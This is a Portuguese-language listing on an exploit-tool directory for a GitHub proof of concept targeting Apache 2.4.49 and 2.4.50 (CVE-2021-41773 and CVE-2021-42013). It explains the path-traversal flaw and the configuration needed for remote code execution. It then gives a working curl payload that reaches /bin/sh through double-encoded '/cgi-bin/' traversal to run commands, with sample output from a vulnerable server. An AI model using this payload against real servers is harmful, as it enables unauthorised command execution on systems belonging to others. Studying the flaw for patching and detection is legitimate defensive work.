Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/mr-exo/cve-2021-41773
ReconhecimentoGeração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de Penetração
GitHubmr-exo/cve-2021-41773

CVE-2021-41773

Exploit de Execução Remota de Código para servidores Apache. Versões afetadas: Apache 2.4.49, Apache 2.4.50

Ver Repositório
11há 4 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Exploit de RCE tanto para Apache 2.4.49 (CVE-2021-41773) quanto para 2.4.50 (CVE-2021-42013):

IMHO apenas configurações "especiais" serão vulneráveis a este RCE.
O mesmo acontece para os exploits de "leitura arbitrária de arquivos" que você viu.

Ambos os CVEs são de fato quase a mesma vulnerabilidade de path traversal (o segundo é a correção incompleta do primeiro).
Path traversal só funciona a partir de uma URI mapeada (ex.: via diretivas "Alias" ou "ScriptAlias" do Apache). Apenas DocumentRoot não é suficiente.

"/cgi-bin/" é mapeado por padrão (ScriptAlias), então é por isso que está sendo usado antes da string de path traversal.
Além disso, ScriptAlias marca como Exec (para o Apache) todo o conteúdo do diretório especificado (independentemente das extensões de arquivo).

Requisitos:

1/ mod_cgi habilitado (não padrão, mas fácil)
2/ o binário alvo deve ser +x (padrão para /bin/sh)
3/ permissões do Apache concedidas para /bin ou / (não padrão e difícil/irreal)

Verificar se o servidor está vulnerável:

curl 'http://IPADDR/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo; id'

Resposta de um servidor vulnerável:

uid=1(daemon) gid=1(daemon) groups=1(daemon)

Baixar ferramenta